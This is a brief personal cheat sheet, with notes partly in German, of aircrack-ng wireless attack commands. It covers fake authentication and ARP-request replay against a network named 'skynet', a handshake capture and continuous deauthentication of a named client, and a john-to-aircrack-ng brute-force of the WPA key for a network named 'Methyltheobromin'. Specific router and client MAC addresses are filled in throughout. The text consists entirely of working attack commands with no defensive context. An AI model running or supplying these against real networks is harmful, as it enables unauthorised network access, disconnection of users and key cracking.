Fake Authentication: 

sudo aireplay-ng -1 100  -e skynet -a 8C:70:5A:B2:66:F4  -h 08:3e:8e:8d:cf:37 wlan0

-a Router
-h Eigene Mac

ARP Request: 
Wenn Client oder Fake Client verbunden ist: 

sudo aireplay-ng -3 -e skynet -h 08:3e:8e:8d:cf:37  wlan0

-e Essid des netzwerks
-h MAC des Clients



you know

sudo airodump-ng -a wlan0 -w stuff -c 1 --bssid 84:C9:B2:C3:8B:2F
sudo aireplay-ng -0 0 -a 84:C9:B2:C3:8B:2F -c AC:22:0B:5E:9B:82 wlan0
john --stdout -incremental=all | aircrack-ng -e Methyltheobromin -a 2 -w - stuff-01.cap
